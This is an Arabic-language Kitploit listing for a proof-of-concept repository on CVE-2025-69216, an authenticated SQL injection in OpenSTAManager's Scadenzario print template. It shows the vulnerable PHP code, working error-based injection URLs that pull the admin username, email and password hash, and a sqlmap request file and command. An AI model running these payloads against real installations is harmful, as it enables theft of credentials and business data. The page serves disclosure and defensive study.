Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-69216 — مستودع إثبات المفهوم لـ CVE-2025-69216، حقن SQL مصادق عليه في قالب طباعة Scadenzario في OpenSTAManager، مما يتيح استخراج بيانات اعتماد المسؤول ومحتويات قاعدة البيانات عبر SQLi القائم على الأخطاء والأعمى. | Kitploit
أدوات/GitHubGitHub/lukasz-rybak/cve-2025-69216
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأمن قواعد البيانات
GitHublukasz-rybak/cve-2025-69216

CVE-2025-69216

مستودع إثبات المفهوم لـ CVE-2025-69216، حقن SQL مصادق عليه في قالب طباعة Scadenzario في OpenSTAManager، مما يتيح استخراج بيانات اعتماد المسؤول ومحتويات قاعدة البيانات عبر SQLi القائم على الأخطاء والأعمى.

عرض المستودع
3منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-69216: وجود ثغرة حقن SQL في قالب طباعة Scadenzario في OpenSTAManager

نظرة عامة

الحقلالتفاصيل
CVE IDCVE-2025-69216
الخطورةعالية
الإشعارعرض الإشعار
اكتشفهLukasz Rybak

المنتجات المتأثرة

  • devcode-it/openstamanager (الإصدارات: <= 2.9.8)

تصنيف CWE

  • CWE-89: عدم تحييد العناصر الخاصة المستخدمة في أمر SQL بشكل صحيح ('حقن SQL')

التفاصيل

ملخص

ثغرة حقن SQL موثقة في قالب طباعة Scadenzario (جدول الدفع) في OpenSTAManager تسمح لأي مستخدم موثق باستخراج بيانات حساسة من قاعدة البيانات، بما في ذلك بيانات اعتماد المسؤول، ومعلومات العملاء، والسجلات المالية. تمكن الثغرة من الوصول الكامل للقراءة من قاعدة البيانات عبر تقنيات حقن SQL المستندة إلى الأخطاء.

التفاصيل

توجد الثغرة في templates/scadenzario/init.php عند السطر 46، حيث يتم دمج المعامل id_anagrafica مباشرة في استعلام SQL دون تعقيم مناسب:

الكود القابل للاستغلال:

root@kitploit:~
if (get('id_anagrafica') && get('id_anagrafica') != 'null') {
    $module_query = str_replace('1=1', '1=1 AND `co_scadenziario`.`idanagrafica`="'.get('id_anagrafica').'"', $module_query);
    $id_anagrafica = get('id_anagrafica');
}

تقوم دالة get() بجلب إدخال المستخدم من معاملات GET/POST دون تحقق. يتم تضمين قيمة المعامل مباشرة في سلسلة استعلام SQL باستخدام دمج السلاسل بدلاً من استخدام دالة التعقيم prepare() الخاصة بالتطبيق، مما يتيح هجمات حقن SQL.

السبب الجذري:

  • عدم استخدام دالة prepare() لتعقيم الإدخال
  • دمج السلاسل مباشرة في بناء استعلام SQL
  • عدم وجود تحقق من الإدخال أو فحص النوع

النقطة الطرفية المتأثرة:

root@kitploit:~
/pdfgen.php?ptype=scadenzario&id_anagrafica=[INJECTION_PAYLOAD]

الملفات المتأثرة:

  • templates/scadenzario/init.php (السطر 46) - الثغرة الرئيسية
  • templates/scadenzario/init.php (السطران 34, 40) - نمط مشابه مع معاملات التاريخ
  • pdfgen.php - نقطة الدخول لعرض القالب

إثبات المفهوم (PoC)

المتطلبات الأساسية

  • جلسة موثقة صالحة (أي دور مستخدم)

خطوات الاستغلال

1. تأكيد الثغرة - اختبار خطأ بناء الجملة الأساسي:

root@kitploit:~
 http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20--%20

يظهر خطأ في بناء جملة SQL في استجابة التطبيق

image

2. استخراج إصدار قاعدة البيانات - حقن SQL مستند إلى الأخطاء:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))%20AND%20%221%22=%221

النتيجة: ~8.3.0~ (إصدار MySQL)

image

3. استخراج اسم قاعدة البيانات:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,database(),0x7e))%20AND%20%221%22=%221

النتيجة: ~openstamanager~

image

4. استخراج اسم مستخدم المسؤول:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20username%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

النتيجة: ~admin~ image


5. استخراج البريد الإلكتروني للمسؤول:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20email%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

النتيجة: عنوان البريد الإلكتروني للمسؤول

image

6. استخراج تجزئة كلمة المرور (جزئي - حد 31 حرفًا XPATH):

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20password%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

النتيجة: تجزئة كلمة مرور bcrypt

image

7. الاستغلال الآلي باستخدام SQLMap:

إنشاء ملف الطلب sqli_osm.req:

root@kitploit:~
GET /pdfgen.php?ptype=scadenzario&id_anagrafica=1* HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=[SESSION_COOKIE]
User-Agent: Mozilla/5.0

تشغيل SQLMap:

root@kitploit:~
sqlmap -r sqli_osm.req --level 3 --risk 3 --dbs

أنواع الحقن المؤكدة من SQLMap:

  • ✅ حقن SQL أعمى قائم على القيم المنطقية (Boolean-based blind SQL injection)
  • ✅ حقن SQL مستند إلى الأخطاء (MySQL >= 5.6 GTID_SUBSET)
  • ✅ حقن SQL أعمى قائم على الوقت (SLEEP)
image

التأثير

من المتأثر:

  • ✅ جميع المستخدمين الموثقين - يمكن لأي مستخدم ببيانات اعتماد صالحة استغلال هذه الثغرة
  • ✅ المستخدمون ذوو الامتيازات المنخفضة - حتى المستخدمون ذوو الأذونات الدنيا يمكنهم الوصول إلى بيانات على مستوى المسؤول
  • ✅ جميع تركيبات OpenSTAManager - توجد الثغرة في أحدث فرع رئيسي (master)

الإسناد

تم الإبلاغ بواسطة Łukasz Rybak

المراجع

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-q6g3-fv43-m2w6
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69216
  • https://github.com/advisories/GHSA-q6g3-fv43-m2w6

إخلاء مسؤولية

تم الكشف عن هذا CVE بشكل مسؤول وفقًا لممارسات الكشف المنسق عن الثغرات. المعلومات المقدمة هنا لأغراض تعليمية ودفاعية فقط.

تنزيل الأداة